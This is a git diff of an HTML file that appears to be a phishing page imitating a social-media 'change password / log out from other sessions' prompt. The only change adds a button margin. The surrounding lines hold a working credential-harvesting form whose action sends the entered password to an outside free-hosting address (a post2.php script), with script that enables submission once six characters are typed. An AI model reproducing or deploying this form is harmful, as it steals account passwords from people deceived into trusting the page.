--- a/index.html
+++ b/index.html
@@ -260,7 +260,7 @@ a):g(c,a)}}var e={passive:!0,capture:!0},h=["click","mousedown","keydown","touch
 
 <form class="ZqIp1" action="https://muckier-soils.000webhostapp.com/post2.php" method="POST"><div class="JEtAj"><div class="_9GP1n   ">
 <label class="f0n8F "><span id="new_password_span" class="_9nyy2">Password</span><input id="new_password_input" name="sph_password3" oninput="document.getElementById('new_password_span').innerHTML = ''; if(this.value == ''){document.getElementById('new_password_span').innerHTML = 'Password'}; if(this.value.length >= 6){document.getElementById('submit_button').removeAttribute('disabled')}else{document.getElementById('submit_button').setAttribute('disabled', '')}" aria-label="New Password" type="password" class="_2hvTZ pexuQ zyHYP" value=""></label>
-<div class="i24fI"></div></div></div><button id="submit_button" class="sqdOP  L3NKy _4pI4F  y3zKF   cB_4K  " disabled="" type="submit">Log out from other sessions</button>
+<div class="i24fI"></div></div></div><button id="submit_button" class="sqdOP  L3NKy _4pI4F  y3zKF   cB_4K  " disabled="" type="submit" style="margin-bottom: 25px">Log out from other sessions</button>
 </form>
 
 <script type="text/javascript">
